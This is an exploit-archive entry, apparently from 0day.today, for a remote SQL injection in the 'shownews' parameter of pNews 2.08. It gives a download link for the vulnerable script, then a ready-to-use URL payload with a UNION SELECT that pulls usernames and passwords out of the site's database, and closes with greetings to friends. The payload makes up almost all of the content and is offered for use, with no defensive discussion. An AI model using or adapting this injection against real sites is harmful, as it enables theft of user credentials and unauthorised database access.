id: 3141
date: 06/08/2008
title: pNews 2.08 (shownews) Remote SQL Injection Vulnerability
author: Cr@zy_King
cves: 

========================================================
pNews 2.08 (shownews) Remote SQL Injection Vulnerability
========================================================



Script Down ; http://www.powie.de/cms/filedb/file.php?id=115&filecat=&eintrag=

http://localhost/index.php?shownews=2'+UNION+SELECT+1,2,username,4,pwd,6,7,8,9,10,11,12+FROM+table/*

Greatz : aLL My Friends :P 




#  0day.today [2023-03-27]  #